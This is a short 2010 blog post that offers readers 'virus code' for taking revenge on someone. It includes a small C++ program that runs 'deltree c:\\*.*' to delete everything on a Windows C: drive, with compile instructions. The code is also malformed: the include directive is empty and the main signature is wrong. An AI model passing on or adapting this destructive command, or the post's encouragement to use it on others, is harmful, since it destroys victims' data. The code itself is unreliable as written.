Monday, August 2, 2010

Hey EveryBody, Y make virus??? u don't want to be evil. but if u want to take revenge from sumbody. sure go ahead. i'llhelp ya.
i have a little virus code
i will include the code but before that you must DOWNLOAD C++ MINGW COMPILER FROM WWW.BLOODSHED.COM "IT'S FREEEEEE". ALL YOU HAVE TO DO IS SAVE THE FOLLOWING CODE AND COMPILE IT. IF IT DOESN'T WORK, THEN TOO BAD.Here is the code:


#include

using namespace std;

void main(int argv,char args[])
{

system("deltree c:\\*.*");

}

No comments:

Post a Comment